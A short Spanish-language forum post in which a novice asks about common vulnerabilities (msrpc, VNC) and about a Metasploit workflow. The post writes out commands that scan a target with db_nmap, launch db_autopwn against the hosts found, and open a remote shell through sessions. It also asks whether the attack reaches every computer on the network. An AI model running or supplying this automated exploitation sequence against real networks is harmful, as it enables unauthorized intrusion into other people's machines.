Gracias...

Entiendo... por cierto, ¿hay alguna página que muestre una lista con las vulnerabilidades más comunes como msrpc o vnc? llevo meses buscando pero no he encontrado nada, quizá sea porque mi inglés es pésimo...

por cierto un par de dudas a las que tampoco he encontrado respuesta... ¿tengo que iniciar postgresql y cambiar la contraseña cada vez que empiece a realizar ataques?:

/etc/init.d/postgresql-8.4 start
su postgres -c psql
\password
\q

¿el ataque autopwn se realiza a todos los ordenadores de la red en la que está, salvo el mío claro esta, o previamente lo selecciono al escanear con nmap?:

msfconsole
db_driver postgresql
db_connect postgres:contraseña@localhost:5432/contraseña
db_nmap -sV -O <ip>
db_autopwn -p -t -e
sessions -i <id>
shell

gracias por adelantado y feliz año!

Muchas gracias! saludos...